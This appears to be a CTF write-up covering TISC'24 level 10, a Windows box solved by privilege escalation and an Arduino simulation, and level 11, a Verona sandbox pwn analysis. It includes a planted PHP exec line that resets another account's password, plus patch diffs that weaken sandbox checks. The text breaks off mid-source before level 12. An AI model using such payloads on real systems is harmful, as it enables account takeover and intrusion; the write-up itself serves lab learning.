TISC'24 Writeups #3

This is the final part of my TISC write-ups, detailing my solutions to level 10-12.

Level 10: Diffuse (Misc)
Level 11: Sandboxed Notes App (Pwn)
Level 12: Revenge of the Dragon (Pwn)

Diffuse

This is a puzzle-type challenge. Each individual step is easy; the difficulty lies in finding every clue in the challenge and piecing it together.

!!! We've found a weird device with a timer counting down! Ccould..it... be...a bomb....?? Your fellow agents found some access into the engineer's machine, will you be able to find some clues and diffuse it before it's too late?

For details on your instance, talk to @DiffuseInstanceBot on Telegram.

We can spin up a challenge instance via the Telegram bot, which gives us SSH credentials. Upon connection, we are dropped into a Windows CMD shell as the user diffuser. Let’s do some enumeration.

diffuser@DIFFUSE C:\Users\diffuser>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       4944
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       444
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       732
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       444
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1176
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       3036
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       860
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1868
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2780
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       2148
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       3996
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       848
[...]

Listing the open ports and active connections, we find that the remote is listening on port 3389, which is commonly used for the remote desktop protocol (RDP). After forwarding the port 3389, we manage to successfully RDP into the server. There are a few memes on the desktop but nothing useful. Looking at the root of the drive, we find some useful information.

Based on the WindowsAzure folder, this is likely a Windows Azure machine. This makes sense as the challenge author would need a cloud service to spin up many Windows machines for players. The xampp folder suggests that the server is running an Apache web server. From the earlier netstat results, the web server could be the listener on port 80. Let’s check it out.

We are presented with a fake ransomware form. Based on the network headers Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3, we can confirm that this is hosted with the Apache server. We are unable to view the server’s source as we have insufficient permissions to read the C:/xampp folder. The client-side source reveals nothing interesting, and neither does analyzing the forwarded traffic. Using a batch script to poll the result of netstat, we find that submitting the form does not open any new remote connections. In fact, submitting the form has no noticeable behaviour.

Continuing our enumeration of the system, we find a similarly named user diffuse (our account is diffuser) but we do not have permission to view their files. Given the similarity in their names, the challenge will likely involve pivoting into the other user (which would require privilege escalation).

Without a clear direction on how to proceed, I tried the following to no avail:

WinPEAS: I tried installing WinPEAS on the machine but Windows Defender blocked it. Without admin permissions, I could not disable Defender.
File system logs: I read so, so many logs but didn’t find anything interesting.
Azure logs: Given that this machine was provisioned by Azure, I thought that I could gleam insights from reading the provision logs. There were many logs, most of which I had permission to read. This didn’t reveal anything other than the fact that the other user diffuse was involved in the provisioning as well.
Browser history: The user must have somehow received the ransomware. I suspected that he would have downloaded it and there might be traces of this activity in the browser history/logs. Unfortunately, the logs were all clean.
Remote IPs: In the full result of netstat -ano, there is also a list of IPs that the target machine is connected to. I suspected that one of the IPs might be the ransomware C2 server but most were either Azure or data center IPs.
Scheduled tasks: All tasks were standard Windows tasks. This was the same result looking through the other typical startup application locations.
Image forensics: There were a few stock/meme images on the Desktop but typical image forensics techniques revealed nothing.
Windows event logs: Without admin permissions, this got nowhere.

At this point, I was pretty stuck and had resorted to blackbox web. Running dirbuster on the target, I found a few interesting routes:

/cgi-bin/ 403 Forbidden
/examples/ 503 Service Unavailable
/licenses/ directory index
/icons/ directory index
/phpmyadmin/
	- js
		- dist
		- vendor
			- bootstrap
			- codemirror
			- jquery
	- themes
		- pmahomme
			- css
			- img
			- jquery
/server-status
/uploads/
	- index.php
	- aaaaa12345.png
/webalizer/ 403 Forbidden (but weird)
	- webalizer.conf
	- msfree.png

Once again, I exhausted a laundry list of blackbox techniques, including:

Directory traversal: Visiting /licenses and /icons results in a directory listing. This is atypical and suggestive of a misconfiguration in the router. I used dotdotpwn to attempt directory traversal attacks.
Vulnerable plugins: We can view the PHP plugins’ licenses from /licenses, which gives us a rough idea on how old the plugins are. There are many outdated plugins with CVEs, but none of the exploits worked (the plugins were likely not activated).
Specific paths in /cgi-bin and /uploads: I set dirbuster to look for files in these two folders.
phpmyadmin: We can actually visit /phpmyadmin but it is filled with errors about failing to connect to the local MySQL server. I tried fixing these errors but didn’t get far without admin permissions.
Monitoring server-status: The /server-status page lists all previous connections requests to the server. I monitored this page after submitting the ransomware form hoping that the attacker would then connect to the page.

Randomly, as I was playing around in the remote desktop, I realized that I could access C:\xampp\apache\bin (although you cannot access either C:\xampp or C:\xampp\apache)! Trying out different paths, I found that you could access the contents of C:\xampp\htdocs\ such as uploads\ or index.php as well. Furthermore, you could overwrite these files and the server would still serve them. Given that the server is running with admin rights, you could use this PHP RCE to achieve privilege escalation. I added the following line to uploads\index.php to changes the password to the diffuse user: <?php exec('net user diffuse pwd') ?>.

The infinite monkey theorem states that a monkey hitting keys at random on a typewriter keyboard for an infinite amount of time will almost surely type any given text, including the complete works of William Shakespeare. I felt like the monkey after figuring out that the xampp directory permissions were misconfigured.

Now, we can login to the “root” account in diffuse. Let’s RDP in again.

This is where we begin a scavenger hunt to find all the pieces of the puzzle. For brevity, I will simply list the relevant files.

Setup: This is the only file in the Recommend tab in the Windows start menu when you first log in. This powershell script is run at system startup using the Task Scheduler. The script installs and sets up dependencies like SSH and Apache, clears the logs and also checks that two files exist: schematic.pdf and firmware.hex. In fact, these are the only two critical files for this challenge.
schematic.pdf: From the Setup script, we can find it in C:\Users\diffuse\AppData\Roaming\Incendiary\Schematics\. Alternatively, looking through Windows Recall shows a screenshot where the user had viewed the PDF. The PDF is a single-page document containing the following diagram (see below).
firmware.hex: This file can be found in the desktop folder project_incendiary. The file is a hexdump in the Intel hex format, which is commonly used for microcontrollers.
There a bunch of other files hinting at some sort of Arduino bomb. In the same desktop folder, we can also find key_to_embed.txt which contains the text "redacted.".

The contents of the PDF. It describes a circuit with an Arduino Uno, 7-segment display, LCD, keypad and key chip.

At the moment, our two most promising leads are the PDF schematic and the firmware hexdump. Converting the hexdump into a raw dump, we find the following suggestive strings.

APP@
123A456B789C*0#D
K2Yl`b7X~2-(S.5(
[Ofm}
ow|9^yq
Wrong decryption
or no key chip!
Less time now!
F8g3a_9V7G2$d#0h
Read key chip:
GoodLuckDefusing
THIS BOMB
Enter Code:
BOOM!
Game Over :)
39AB41D072C
Bomb defused!

This ties in to the challenge description of defusing a bomb. There are some write-ups online on reversing Arduino firmware which we can use to confirm that this is indeed an Arduino firmware dump.

$ xxd firmware.bin | head
00000000: 0c94 6301 0c94 8b01 0c94 8b01 0c94 6d09  ..c...........m.
00000010: 0c94 6d09 0c94 6d09 0c94 8b01 0c94 8b01  ..m...m.........
00000020: 0c94 8b01 0c94 8b01 0c94 8b01 0c94 8b01  ................
00000030: 0c94 8b01 0c94 8b01 0c94 8b01 0c94 8b01  ................
00000040: 0c94 2309 0c94 8b01 0c94 8b01 0c94 8b01  ..#.............
00000050: 0c94 8b01 0c94 8b01 0c94 8b01 0c94 8b01  ................
00000060: 0c94 e509 0c94 8b01 5209 6ad5 3036 a538  ........R.j.06.8
00000070: bf40 a39e 81f3 d7fb 7ce3 3982 9b2f ff87  .@......|.9../..
00000080: 348e 4344 c4de e9cb 547b 9432 a6c2 233d  4.CD....T{.2..#=
00000090: ee4c 950b 42fa c34e 082e a166 28d9 24b2  .L..B..N...f(.$.

We can spot the distinctive AVR jump table at the start of the hexdump. '0c94' is the 'JMP' instruction opcode in AVR.

I spent a long time reversing the binary throughout the challenge but as we will soon see, it was not at all necessary. If you are interested, this article is a good primer on reversing Arduino in IDA and this repository details Diaphora usage.

Examining the schematic PDF, we can see references to Wokwi. Wokwi is a microcontroller simulator site with a robust feature set. In fact, we can recreate the entire circuit in Wokwi based on the schematic. Wokwi does not have a uart-key-chip part so we use a Custom Chip part as a substitute. We will likely have to implement some logic on the custom chip later for the bomb to work.

After replicating the entire circuit setup, we can upload the firmware file on Wokwi, which will simulate running it on the Arduino within the browser!

Three messages appear on the LCD. The first message is “Read key chip:”, the second message is “GoodLuckDefusing THIS BOMB”, with the final message appearing as part of the main interaction loop of the Arduino.

The LCD prompts us for a code, which we can input using the keypad, using the pound key to submit it. At the same time, the 7-segment display shows a countdown timer starting at 5 minutes. Every incorrect attempt produces the message: “Wrong decryption or no key chip!” and “Less time now!”, reducing our time by 30 seconds. When the timer runs out, the message “BOOM! Game Over :)” appears.

Based on the context, we likely need to enter the right code to defuse the bomb, which will reward us with the flag. Based on the error message, it seems as though the Arduino is not detecting the key chip. This is likely because the Arduino is expecting the key chip to do something but our custom chip currently does nothing.

From the part name uart-key-chip (9600), we can guess that the chip uses the UART protocol to communicate with the Arduino. I used the following custom chip code to receive UART data with a baud rate of 9600:

#include "wokwi-api.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
  uart_dev_t uart0;
} chip_state_t;

static void on_uart_rx_data(void *user_data, uint8_t byte);
static void on_uart_write_done(void *user_data);

void chip_init(void) {
  chip_state_t *chip = malloc(sizeof(chip_state_t));

  const uart_config_t uart_config = {
    .tx = pin_init("OUT", INPUT_PULLUP),
    .rx = pin_init("IN", INPUT),
    .baud_rate = 9600,
    .rx_data = on_uart_rx_data,
    .write_done = on_uart_write_done,
    .user_data = chip,
  };
  chip->uart0 = uart_init(&uart_config);
  printf("UART Chip initialized!\n");
}

int byte_number = 1;

static void on_uart_rx_data(void *user_data, uint8_t byte) {
  chip_state_t *chip = (chip_state_t*)user_data;
  printf("Incoming UART data (byte %d): %d\n", byte_number++, byte);
}

We find the following logs in the Wokwi terminal:

 Incoming UART data (byte 1): 70
 Incoming UART data (byte 2): 56
 Incoming UART data (byte 3): 103
 Incoming UART data (byte 4): 51
 Incoming UART data (byte 5): 97
 Incoming UART data (byte 6): 95
 Incoming UART data (byte 7): 57
 Incoming UART data (byte 8): 86
 Incoming UART data (byte 9): 55
 Incoming UART data (byte 10): 71
 Incoming UART data (byte 11): 50
 Incoming UART data (byte 12): 36
 Incoming UART data (byte 13): 100
 Incoming UART data (byte 14): 35
 Incoming UART data (byte 15): 48
 Incoming UART data (byte 16): 104

This is actually one of the strings we found in the firmware earlier: “K2Yl`b7X~2-(S.5(“. We can also send data to the board as follows:

int byte_number = 1;
char* key = "ABCDEFGHabcdefgh";

static void on_uart_rx_data(void *user_data, uint8_t byte) {
  chip_state_t *chip = (chip_state_t*)user_data;
  printf("Incoming UART data (byte %d): %d\n", byte_number++, byte);

  uint8_t data_out = key[byte_number - 2];
  printf("Writing key back: %d\n", data_out);
}

static void on_uart_write_done(void *user_data) {
  chip_state_t *chip = (chip_state_t*)user_data;
  printf("UART write done\n");
}

This changes the behaviour of the bomb. Now, the first message says Read key chip: ABCDEFGHabcdefgh instead of remaining empty. We have to send the key byte by byte with every byte of data we receive because sending the key in one go produces a corrupt key on the Read key chip: screen. This also suggests that the correct key is 16 characters long, the number of bytes the custom chip receives. Recalling the file key_to_embed.txt containing the text redacted., we likely have to figure out the correct key to send back to the board.

Figuring out that something was missing, I decided to look through all the puzzle pieces I had. Examining the PDF, I realized that although it was a single page document, it said “Page 1 of 2” in the footer. Suspecting that this might be a clue, I decided to perform PDF forensics on the file using PDFtk. This revealed that there indeed was a hidden second page containing the text: note to self: need to pull down the RNG pin (this text is actually invisible but most forensic tools will identify it) and key: m59F$6/lHI^wR~C6.

Promisingly, we have found a 16-character key which we can use in our custom chip. The other hint tells us that we need to pull down the RNG pin. From the schematic earlier, we notice that there is the word “RNG” next to the A0 pin, implying that that is our target pin. Pulling down a pin is an electrical engineering term that means to connect the pin to ground. The last piece of the puzzle is figuring out what the correct code to enter is. This is actually rather simple – 39AB41D072C from the result of strings on the firmware turns out to be the correct code.

Supplying the key we found via the key chip, entering this code greets us with a new message: "Bomb defused! Find your flag in the I2C bus...".

The resistor and switch in the bottom left of the circuit is used to pull down pin A0.

Nice! The I2C pins (SDA/SCL) are currently used by the LCD display, which actually uses the I2C protocol too. We can attach another custom chip that shares those two pins and dumps all I2C traffic. The code is not dissimilar to the key chip’s, but uses the different methods for the I2C protocol instead.

#include "wokwi-api.h"
#include <stdio.h>
#include <stdlib.h>

const int ADDRESS = 0x0;  // Listen for all requests

typedef struct {
  pin_t pin_int;
  uint8_t counter;
  uint32_t threshold_attr;
} chip_state_t;

static bool on_i2c_connect(void *user_data, uint32_t address, bool connect);
static uint8_t on_i2c_read(void *user_data);
static bool on_i2c_write(void *user_data, uint8_t data);
static void on_i2c_disconnect(void *user_data);

void chip_init() {
  chip_state_t *chip = malloc(sizeof(chip_state_t));

  chip->pin_int = pin_init("INT", INPUT);
  chip->counter = 0;

  const i2c_config_t i2c_config = {
    .user_data = chip,
    .address = ADDRESS,
    .scl = pin_init("SCL", INPUT),
    .sda = pin_init("SDA", INPUT),
    .connect = on_i2c_connect,
    .read = on_i2c_read,
    .write = on_i2c_write,
    .disconnect = on_i2c_disconnect,
  };
  i2c_init(&i2c_config);

  printf("Hello from custom chip!\n");
}

bool on_i2c_connect(void *user_data, uint32_t address, bool connect) {
  printf("i2c conn\n");
  return true; /* Ack */
}

uint8_t on_i2c_read(void *user_data) {
  printf("i2c read\n");
  return 0;
}

bool on_i2c_write(void *user_data, uint8_t data) {
  printf("i2c write 0x%x\n", data);
  return true; // Ack
}

void on_i2c_disconnect(void *user_data) {
  // Do nothing
}

Parsing the dumped bytes, we find the flag repeated multiple times: TISC{h3y_Lo0k_1_m4d3_My_0wn_h4rdw4r3_t0k3n!}

While I presented this write-up in a relatively straightforward manner, I went down rabbit-holes at every step of solving this challenge. After gaining access to the diffuse account, it took an embarrassing amount of time to find the PDF and discover its hidden second page. As a result, I spent way too long reversing the firmware to figure out the key checking mechanism.

Sandboxed Notes App

In fair Verona, where we lay our scene…

As its name alludes to, this is a binary exploitation notes app challenge. In the distributed folder, we find the following files:

build/
	- chall
	- sandboxedlib.so
include/
	- child_malloc.h
	- host_service_calls.h
lib/
	- library_runner
	- libsandbox.so
src/
	- chall.cpp
	- sandboxedlib.cpp
chall.patch
CMakeLists.txt
Dockerfile
flag.txt
README.md
run.sh

This challenge requires a fair bit of background knowledge into Verona internals. I will provide a concise explanation of its essential features. However, I will not be covering everything in the Verona sandbox’s rich feature set. I highly recommend reading its readme, which provides a high-level overview of its internals, for a more complete understanding.

This challenge uses Microsoft’s Verona sandbox to sandbox a vulnerable library sandboxedlib.so. As with any sandbox, the Verona sandbox aims to isolate unsafe code while allowing controlled interactions with the host system. One interesting feature of the Verona sandbox is that the parent has a shared region of memory with the sandboxed library. This is called the sandbox heap and is mapped at the same address in both processes so that data structures with pointers can work in both the parent and the child.

The sandboxed library sandboxedlib.so also exposes sandboxed functions that the parent binary chall can call. The parent process does not interact directly with the sandboxed library. Instead, it communicates with a child process library_runner. This binary is built directly from the Verona sandbox source and is required in all usages of the sandbox. After starting the child process, the parent uses seccomp to secure it. The binary loads the vulnerable library into memory and communicates with the parent through a number of handles. Under the sandbox’s threat model, the attacker (controlling the vulnerable library) is assumed to be able to corrupt any memory owned by the sandbox.

As a final bit of context, let’s discuss the snmalloc allocator, a bespoke “message passing based allocator” developed by Microsoft. This allocator supports allocations and deallocations across threads by using message passing to communicate. The Verona sandbox extends the snmalloc allocator to support allocations between the parent and the child (or multiple childs). Within the sandbox, memory is managed using this allocator, overriding the standard glibc malloc and free implementations. The snmalloc allocator uses a pagemap to track the status of allocations within a heap. When used in the Verona sandbox, both the pagemap and the shared heap are mapped in both the parent and the child. However, only the parent has write access to the pagemap segment since the child is untrusted. When the child needs more memory, it sends a chunk allocation request (typically of size 1 MiB) to the parent via a RPC protocol. The parent validates the request, then services it within the shared sandboxed heap. The child can then use the allocated chunk for further allocations.

The patch chall.patch introduces vulnerabilities to a recent version of the sandbox. The patches disable checks in libsandbox.cc and increase the security of the seccomp filters in sandbox_seccomp-bpf.h. Let’s first look at the patches on the former:

diff --git a/src/libsandbox.cc b/src/libsandbox.cc
index ddb12c4..257753e 100644
--- a/src/libsandbox.cc
+++ b/src/libsandbox.cc
@@ -149,14 +149,6 @@ namespace sandbox
           continue;
         }
         HostServiceResponse reply{0, 0};
-        auto is_metaentry_valid =
-          [&](size_t size, SharedAllocConfig::Pagemap::Entry& metaentry) {
-            auto sizeclass = metaentry.get_sizeclass();
-            auto remote = metaentry.get_remote();
-            return ((remote == nullptr) ||
-                    s->contains(remote, sizeof(snmalloc::RemoteAllocator))) &&
-              (snmalloc::sizeclass_full_to_size(sizeclass) <= size);
-          };
         // No default so we get range checking.  Fallthrough returns the error
         // result.
         switch (rpc.kind)
@@ -180,11 +172,6 @@ namespace sandbox
             // case where the remote is not the single remote of the allocator
             // associated with this sandbox for use on the outside.
             SharedAllocConfig::Pagemap::Entry metaentry{meta, ras};
-            if (!is_metaentry_valid(size, metaentry))
-            {
-              reply.error = 1;
-              break;
-            }
             snmalloc::capptr::Arena<void> alloc;
             {
               auto [g, m] = s->get_memory();
@@ -195,7 +182,6 @@ namespace sandbox
               reply.error = 2;
               break;
             }
-            metaentry.claim_for_sandbox();
             SharedAllocConfig::Pagemap::set_metaentry(
               address_cast(alloc), size, metaentry);

libsandbox.cc is the Verona sandbox source file containing the main parent sandbox logic. Most of the patches in this file target the MemoryServiceProvider class. The parent uses this class to handle chunk allocation requests from the child. The MemoryServiceProvider::run() method polls for RPC protocol messages from the child and handles them accordingly. The child uses the RPC messages AllocChunk and DeallocChunk to interact with the memory provider.

The prior patch removes checks in the AllocChunk handler path. Here is the original code:

        auto is_metaentry_valid = // [!] removed in the patch
          [&](size_t size, SharedAllocConfig::Pagemap::Entry& metaentry) {
            auto sizeclass = metaentry.get_sizeclass();
            auto remote = metaentry.get_remote();
            return ((remote == nullptr) ||
                    s->contains(remote, sizeof(snmalloc::RemoteAllocator))) &&
              (snmalloc::sizeclass_full_to_size(sizeclass) <= size);
          };

		switch (rpc.kind)
        {
          case AllocChunk:
          {
            auto size = static_cast<size_t>(rpc.args[0]);
            if (
              (size < snmalloc::MIN_CHUNK_SIZE) ||
              !snmalloc::bits::is_pow2(size))
            {
              reply.error = 3;
              break;
            }
            auto meta =
              reinterpret_cast<SharedAllocConfig::Backend::SlabMetadata*>(
                rpc.args[1]);
            auto ras = rpc.args[2];
            // `meta` refers to the pointer to the slab metadata.  This field in
            // the `Entry` is dereferenced outside of the sandbox only in the
            // case where the remote is not the single remote of the allocator
            // associated with this sandbox for use on the outside.
            SharedAllocConfig::Pagemap::Entry metaentry{meta, ras};
            if (!is_metaentry_valid(size, metaentry)) // [!] removed in patch
            {
              reply.error = 1;
              break;
            }
            snmalloc::capptr::Arena<void> alloc;
            {
              auto [g, m] = s->get_memory();
              alloc = m.alloc_range(size);
            }
            if (alloc == nullptr)
            {
              reply.error = 2;
              break;
            }
            metaentry.claim_for_sandbox(); // [!] removed in patch
            SharedAllocConfig::Pagemap::set_metaentry(
              address_cast(alloc), size, metaentry);

            reply.ret = alloc.unsafe_uintptr();
            break;
          }

When the child sends a AllocChunk request, it sends three parameters: size, meta and ras. The handler accesses these parameters with rpc.args[i]. The requested chunk allocation size is stored in size while the other two parameters form a metaentry. Metaentries are records of allocation metadata that are stored in the pagemap. These entries contain metadata that enables the snmalloc allocator to track allocations and deallocations across threads/processes. What exactly this metadata encodes is largely beyond the scope of this write-up, but I will touch on the relevant parts as they come up.

The patches removes the check on the metaentry’s validity and also stops the sandbox from claiming ownership on the metaentry. This means that the child can send allocation requests with arbitrary metaentries and register them in the pagemap. This registration happens with SharedAllocConfig::Pagemap::set_metaentry() at the end of the handler.

  static void set_metaentry(snmalloc::address_t p, size_t size, const Entry& t)
  {
	auto [g, pm] = get_pagemap_writeable();
	for (snmalloc::address_t a = p; a < p + size;
		 a += snmalloc::MIN_CHUNK_SIZE)
	{
	  pm.set(a, t);
	}
  }

Pagemap::set_metaentry is defined in sandbox.h. This function registers the metaentry with every page the allocated chunk overlaps with.

Helpfully, we find the following comment in the source code explaining this function:

/**
* Sets metadata in the shared pagemap.  This assumes callers are trusted
* and does not validate the metadata.  This is called only by the trusted
* allocator, the RPC thread updating the pagemap on behalf of a child
* will write to the pagemap directly.

This function assumes that the caller is trusted and that the metadata has already been validated. Patching out the validation checks in the RPC thread is a clear violation of the security model so we can likely exploit this. (This is important for later!)

The next patch is on the DeallocChunk handler path, removing almost all the checks. For clarity, I have presented the original code with the patch’s removals applied as comments:

case DeallocChunk:
	  {
		auto ptr = snmalloc::capptr::Arena<void>::unsafe_from(
		  reinterpret_cast<void*>(rpc.args[0]));
		size_t size = static_cast<size_t>(rpc.args[1]);
		if (!s->contains(ptr.unsafe_ptr(), size))
		{
		  reply.error = 1;
		  break;
		}
//		// The size must be a power of two, larger than the chunk size
// 		if (!(snmalloc::bits::is_pow2(size) &&
// 			  (size >= snmalloc::MIN_CHUNK_SIZE)))
// 		{
// 		  reply.error = 2;
// 		  break;
// 		}
// 		// The base must be chunk-aligned
// 		if (
// 		  snmalloc::pointer_align_down(
// 			ptr.unsafe_ptr(), snmalloc::MIN_CHUNK_SIZE) != ptr.unsafe_ptr())
// 		{
// 		  reply.error = 3;
// 		  break;
// 		}
// 		auto address = snmalloc::address_cast(ptr);
// 		for (size_t chunk_offset = 0; chunk_offset < size;
// 			 chunk_offset += snmalloc::MIN_CHUNK_SIZE)
// 		{
// 		  auto& meta = SharedAllocConfig::Pagemap::get_metaentry_mut(
// 			address + chunk_offset);
// 		  if (!meta.is_sandbox_owned())
// 		  {
// 			reply.error = 4;
// 			break;
// 		  }
// 		}
		if (reply.error == 0)
		{
		  SharedAllocConfig::Backend::dealloc_range(*s, ptr, size);
		}
		break;

This RPC calls takes two parameters: ptr, the chunk to deallocate, and size, the chunk’s size. With the patch, the handler only checks that ptr lies within the sandboxed (shared) heap before deallocating it with SharedAllocConfig::Backend::dealloc_range(). That function deallocates the chunk and creates a new metaentry that ties ownership of the freed chunk to the backend:

  static void dealloc_range(
	LocalState& local_state,
	snmalloc::capptr::Arena<void> base,
	size_t size)
  {
	Pagemap::Entry t;
	t.claim_for_backend();
	Pagemap::set_metaentry(base.unsafe_uintptr(), size, t);
	auto [g, m] = local_state.get_memory();

	m.dealloc_range(base, size);
  }

There are other patches in libsandbox.cc but I will only cover this critical patch:

@@ -773,15 +734,14 @@ namespace sandbox
         if (!meta.is_backend_owned())
         {
           auto* remote = meta.get_remote();
-          if (!meta.is_sandbox_owned() && (remote != nullptr))
+          if (
+            (remote != nullptr) &&
+            !contains(remote, sizeof(snmalloc::RemoteAllocator)))
           {
             delete meta.get_slab_metadata();
           }
         }
         meta = empty;
-        SANDBOX_DEBUG_INVARIANT(
-          !meta.is_sandbox_owned(),
-          "Unused pagemap entry must not be sandbox owned");
       }
     }
     shared_mem->destroy();

This patch is applied on Library::~Library(). The Library class is used by the parent chall to instantiate a child sandbox. Its constructor sets up the shared heap, which is cleaned up by the destructor. The destructor iterates through all pagemap entries and deallocates all metaentries that are not currently owned by the backend or a sandbox. The patch changes the check’s condition, instead checking that the remote is not part of the library’s underlying memory provider (that backs the shared heap).

  Library::~Library()
  {
    wait_for_child_exit();
    {
      auto [g, pm] = SharedAllocConfig::Pagemap::get_pagemap_writeable();
      snmalloc::address_t base =
        snmalloc::address_cast(memory_provider.base_address());
      auto top = snmalloc::address_cast(memory_provider.top_address());
      SharedAllocConfig::Pagemap::Entry empty{nullptr, 0};
      // Scan the pagemap for all memory associated with this and deallocate
      // the metaslabs.  Note that we don't need to do any cleanup for the
      // memory referenced by these metaslabs: it will all go away when the
      // shared memory region is deallocated.
      for (snmalloc::address_t a = base; a < top; a += snmalloc::MIN_CHUNK_SIZE)
      {
        auto& meta = SharedAllocConfig::Pagemap::get_metaentry_mut(a);
        if (!meta.is_backend_owned())
        {
          auto* remote = meta.get_remote();
          if (!meta.is_sandbox_owned() && (remote != nullptr))
          {
            delete meta.get_slab_metadata();
          }
        }
        meta = empty;
        SANDBOX_DEBUG_INVARIANT(
          !meta.is_sandbox_owned(),
          "Unused pagemap entry must not be sandbox owned");
      }
    }
    shared_mem->destroy();
  }

The original destructor.

The rest of the patches increase the security of the sandbox. One patch enables ASLR within the sandboxed child. The other patches impose further seccomp restrictions on the child; by default, the Verona sandbox already has a comprehensive set of seccomp rules preventing the child from breaking the security model (including preventing the accessing of arbitrary files).

Next, let’s look at the challenge source in chall.cpp.

#include "process_sandbox/cxxsandbox.h"
#include "process_sandbox/sandbox.h"

#include <limits.h>
#include <stdio.h>

using namespace sandbox;

bool new_note();
bool edit_note();
bool free_note();
bool view_note();


/**
 * The structure that represents an instance of the sandbox.
 */
struct ChallSandbox
{
  /**
   * The library that defines the functions exposed by this sandbox.
   */
  Library lib = {"../build/sandboxedlib.so"};
#define EXPORTED_FUNCTION(public_name, private_name) \
  decltype(make_sandboxed_function<decltype(private_name)>(lib)) public_name = \
    make_sandboxed_function<decltype(private_name)>(lib);
    EXPORTED_FUNCTION(new_note, ::new_note)
    EXPORTED_FUNCTION(edit_note, ::edit_note)
    EXPORTED_FUNCTION(free_note, ::free_note)
    EXPORTED_FUNCTION(view_note, ::view_note)
};

void menu() {
  printf(
    "Notes app\n" \
    "1. New note\n" \
    "2. Delete note\n" \
    "3. Edit note\n" \
    "4. View note\n" \
    "5. Provide feedback\n" \
    "6. Review feedback\n"
    "7. Exit\n" \
  );
}

int get_option() {
  int opt = 0;
  printf("> ");
  if (scanf("%d", &opt) != 1) { return -1; }
  return opt;
}

void init_stuff() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
}

struct feedback {
  char *ptr;
  size_t size;
  char content[460];
};

struct feedback *the_feedback = NULL;

bool get_feedback() {
  if (the_feedback == NULL) {
    if ((the_feedback = (struct feedback *)malloc(sizeof(struct feedback))) == NULL) {
      printf("Out of memory.\n");
      return false;
    }
    the_feedback->ptr = (char *)&the_feedback->content;
    the_feedback->size = sizeof(the_feedback->content);
  }
  printf("Thank you for using this app!\n");
  printf("Please provide your feedback: ");
  read(0, the_feedback->ptr, the_feedback->size);
  return true;
}

bool view_feedback() {
  if (the_feedback == NULL) {
    printf("No feedback.\n");
    return false;
  }
  printf("Your feedback: ");
  write(1, the_feedback->ptr, the_feedback->size);
  return true;
}

void sandboxed_session()
{
  ChallSandbox sandbox;
  bool end = false;
  bool result = true;
  while (!end) {
    menu();
    switch (get_option()) {
      case 1:
        result = sandbox.new_note();
        break;
      case 2:
        result = sandbox.free_note();
        break;
      case 3:
        result = sandbox.edit_note();
        break;
      case 4:
        result = sandbox.view_note();
        break;
      case 5:
        result = get_feedback();
        break;
      case 6:
        result = view_feedback();
        break;
      default:
	puts("Invalid input, exiting...");
        end = true;
        break;
    }
    if (!end) {
      if (result) { printf("Operation success.\n"); }
      else { printf("Operation failed.\n"); }
    }
  }
  // here sandbox will be destroyed
}

int main()
{
  init_stuff();

  do {
    sandboxed_session();

    printf("1. Start a new clean session\n2. Definitively exit\n");
  } while (get_option() == 1);

  return 0;
}

The challenge is a typical notes app. Most of its features are implemented within the sandbox sandboxedlib.so. Only the get_feedback() and view_feedback() functions are implemented in the parent. When the user chooses other options, the parent performs an external call into the sandbox. The challenge also supports repeated creation of the sandbox.

Due to the seccomp rules, we can only read the flag from the parent even we can gain RCE in the child process. However, there are no vulnerabilities in the parent. Both the get_feedback() and view_feedback() functions are safe (other than a possible leak from the write() in view_feedback()). Nonetheless, the function pointer and size parameter in the feedback struct are an attractive target for exploitation subsequently.

Let’s take a look at the untrusted library sandboxedlib.cpp imported by the child. The binary includes the functions sendRequest, try_dealloc and try_alloc but does not use them. The only vulnerability in the exposed functions is a trivial use-after-free: freeing a note in free_note() does not zero out the note pointer.

#include "../src/host_service_calls.h"
#include "process_sandbox/cxxsandbox.h"
#include "process_sandbox/sandbox.h"
#include "process_sandbox/shared_memory_region.h"

#include <limits>
#include <stdio.h>

using namespace sandbox;
using namespace snmalloc;

HostServiceResponse sendRequest(HostServiceRequest req)
{
  auto written_bytes = write(PageMapUpdates, &req, sizeof(req));
  HostServiceResponse response;
  auto read_bytes = read(PageMapUpdates, &response, sizeof(response));
  UNUSED(written_bytes);
  UNUSED(read_bytes);
  return response;
}

uintptr_t try_dealloc(const void* addr, size_t size)
{
  HostServiceRequest req{
    DeallocChunk,
    {reinterpret_cast<uintptr_t>(addr), static_cast<uintptr_t>(size), 0, 0}};
  return sendRequest(req).error;
}

HostServiceResponse try_alloc(size_t size, uintptr_t meta, uintptr_t ras)
{
  return sendRequest({AllocChunk, {size, meta, ras}});
}

#define NOTES_MAX 10

struct note {
  size_t size;
  void (*printfn)(struct note *);
  char *contents;
};

struct note *notes[NOTES_MAX] = { 0 };

static bool get_idx(unsigned int *idx_ptr) {
  printf("Enter index of note: ");
  if (scanf("%u", idx_ptr) != 1) { return false; }
  if (*idx_ptr >= NOTES_MAX) { return false; }
  return true;
}

static void print_note(struct note *n) {
  write(1, n->contents, n->size);
  printf("\n");
}

static bool new_note() {
  unsigned int idx = 0;
  size_t size = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  printf("Enter size of note: ");
  if (scanf("%lu", &size) != 1) { return false; }
  if (size > 0x100) { return false; }
  if ((notes[idx] = (struct note *)malloc(sizeof(struct note))) == NULL) {
    return false;
  }
  if ((notes[idx]->contents = (char *)malloc(size)) == NULL) {
    return false;
  }
  notes[idx]->size = size;
